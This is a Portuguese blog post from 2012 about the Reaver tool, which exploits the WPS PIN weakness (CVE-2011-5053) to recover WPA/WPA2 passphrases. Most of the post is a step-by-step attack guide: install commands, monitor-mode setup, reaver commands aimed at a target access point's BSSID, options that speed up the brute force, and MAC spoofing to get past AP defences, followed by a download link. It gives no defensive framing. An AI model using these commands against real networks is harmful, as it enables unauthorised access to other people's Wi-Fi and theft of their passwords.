sexta-feira, 13 de abril de 2012

Wi-Fi Protected Setup (WPS) exploit – CVE-2011-5053

Reaver implementa um ataque de força bruta contra PINs de WiFi Protected Setup (WPS) , a fim de recuperar senhas WPA/WPA2, conforme descrito aqui.
Reaver foi concebido para ser um ataque robusto e prático contra WPS, e foi testado contra uma ampla variedade de access point e implementações WPS.Em média Reaver irá recuperar do access point o texto simples WPA/WPA2  passphrase em 4 a 10 horas, dependendo da access point. Na prática, geralmente leva metade desse tempo para adivinhar o WPS correto e recuperar a senha.




Instalação

Reaver é suportado apenas na plataforma Linux, requer as libs libpcap e libsqlite3, e pode ser construído e instalado pelo comando:

$ ./configure
$ make
# make install


Uso Básico

Primeiro, verifique se sua placa wireless está em modo monitor:# airmon-ng start wlan0Para executar Reaver, você deve especificar o BSSID do alvo AP eo nome da interface de modo monitor (geralmente “mon0 ’, não’ wlan0 ’, embora isto pode variar dependendo de sua placa wireless / drivers):# reaver -i mon0 -b 00:01:02:03:04:05
Você pode também querer usar -vv para obter informação detalhada sobre o andamento Reaver:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Acelerando o ataque

Por padrão, Reaver tem um atraso de 1 segundo entre as tentativas dos pins. Você pode desativar esse atraso, adicionando ”-d 0″ na linha de comando, mas alguns APspodem não gostar:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Outra opção que pode acelerar um ataque é –dh-small. Esta opção instrui Reaver para usar pequenos números de Diffie-Hellman secretos, a fim de reduzir a carga computacional sobre o alvo AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing

Em alguns casos você pode querer/precisar falsificar o endereço MAC. Reaver suporta MAC spoofing com a opção –mac, mas você deve garantir que você tenha falsificado o seu MAC corretamente para que ele funcione.


Alterando o endereço MAC da interface virtual modo monitor (normalmente chamado mon0) não funcionará. Você deve alterar o endereço MAC da interface física de sua placa wireless. Por exemplo:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69



Download: Reaver 1.4

Ref:  Unknown AntiSec

0 comentários:

Postar um comentário

 

SECURITY MASTER Copyright © 2011 -- Template created by Security Master -- Powered by Blogger